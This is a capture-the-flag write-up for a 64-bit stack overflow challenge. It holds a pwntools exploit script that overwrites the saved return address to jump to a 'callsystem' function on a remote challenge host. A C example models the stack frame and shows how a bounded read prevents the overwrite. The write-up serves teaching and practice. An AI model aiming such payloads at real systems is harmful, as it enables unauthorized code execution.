Challenge analysis
After downloading the file, first use checksec to check its protection mechanisms.
The file name is too long, so it was shortened a bit.
It is a 64-bit program, so open it in IDA and view the pseudo-code.
We notice a function with a notable name, callsystem.
The idea is clear: a direct stack overflow.
Collecting information
Determining the offset
/bin/sh address
Method 1
Method 2
Writing the script
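from pwn import *

p = remote('111.198.29.45', 32366)
#p = process("./pwn001")
system = 0x400596  # value written over the saved return address
# 0x80 bytes fill the buffer, 8 bytes cover saved rbp, then the return address
payload = b"A"*0x80 + b"b"*8 + p64(system)  # bytes literals: str + bytes fails on Python 3
p.sendlineafter(b"Hello, World", payload)
p.interactive()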
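The 0x80 + 8 padding in the script corresponds to the frame layout modelled below. This is an added example, not code from the challenge binary; the struct, the function names and the sentinel values are assumptions. It shows a read bounded by the buffer size leaving the saved return address intact when given the same 0x90 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x80   /* the 0x80 bytes of "A" padding in the script */

/* Assumed frame model: x86-64, no stack canary. */
struct frame {
    char     buf[BUF_SIZE];
    uint64_t saved_rbp;  /* reached by the 8 "b" bytes */
    uint64_t ret;        /* reached by p64(system) */
};

/* Store at most cap bytes, drain the rest until EOF, and report how many
 * bytes were offered so the caller can reject oversized input. */
ssize_t bounded_read(int fd, char *buf, size_t cap, size_t *offered) {
    char spill[64];
    ssize_t n, kept = read(fd, buf, cap);
    if (kept < 0) return -1;
    *offered = (size_t)kept;
    while ((size_t)kept == cap && (n = read(fd, spill, sizeof spill)) > 0)
        *offered += (size_t)n;
    return kept;
}

/* Send len constructed bytes through a pipe into a modelled frame.
 * Returns the number of bytes offered, or -1 if the frame was damaged. */
long feed_frame(size_t len) {
    int fds[2];
    char input[0x200];
    size_t offered = 0;
    struct frame f = { .saved_rbp = 0x1111, .ret = 0x2222 };  /* sentinels */
    if (len > sizeof input || pipe(fds) != 0) return -1;
    memset(input, 'A', len);
    if (write(fds[1], input, len) != (ssize_t)len) return -1;
    close(fds[1]);
    ssize_t kept = bounded_read(fds[0], f.buf, sizeof f.buf, &offered);
    close(fds[0]);
    if (kept < 0 || f.saved_rbp != 0x1111 || f.ret != 0x2222) return -1;
    return (long)offered;
}

int main(void) {
    printf("ret offset: 0x%zx\n", offsetof(struct frame, ret));
    printf("0x90 bytes offered -> %ld, frame intact\n", feed_frame(0x90));
    return 0;
}
```

The drain loop runs until EOF, which suits the pipe used here; on an interactive stream the caller would stop at a delimiter instead.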
Local test
Remote target test